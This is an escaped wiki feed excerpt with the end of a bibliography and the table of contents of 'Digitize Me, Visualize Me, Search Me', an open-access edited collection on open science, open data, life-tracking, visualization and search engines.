&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5500</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5500"/>
		<updated>2013-11-02T11:23:03Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
;[http://prisom.me/ #PRISOM]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
